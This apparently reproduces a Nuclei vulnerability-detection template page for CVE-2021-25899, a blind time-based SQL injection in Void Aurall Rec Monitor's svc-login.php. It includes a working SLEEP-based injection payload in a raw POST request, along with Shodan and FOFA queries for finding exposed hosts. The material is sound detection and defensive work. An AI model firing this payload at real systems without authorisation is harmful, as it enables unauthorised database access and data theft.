Void Aural Rec Monitor 9.0.0.1 - SQL Injection

ID: CVE-2021-25899

Severity: high

Author: edoardottt

Tags: time-based-sqli,cve2021,cve,sqli,void,aurall

Description

Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

id: CVE-2021-25899

info:
  name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection
  author: edoardottt
  severity: high
  description: |
    Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1.
  reference:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25899
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-25899
    cwe-id: CWE-89
    epss-score: 0.51506
    epss-percentile: 0.9756
    cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: void
    product: aurall_rec_monitor
    shodan-query:
      - html:"AURALL"
      - http.html:"aurall"
    fofa-query: body="aurall"
  tags: time-based-sqli,cve2021,cve,sqli,void,aurall

http:
  - raw:
      - |
        @timeout: 15s
        POST /AurallRECMonitor/services/svc-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Contacte con el administrador")'
        condition: and
# digest: 4a0a004730450221008c40d31a3bdb786a16659f618a8e4361e3b87785e9f8ce8e734cc80dd194d9c50220793043ee2acc769007c6eca5ef822eee24b305229e29fdaf321ae0b2fda9e8b2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25899.yaml"

View on Github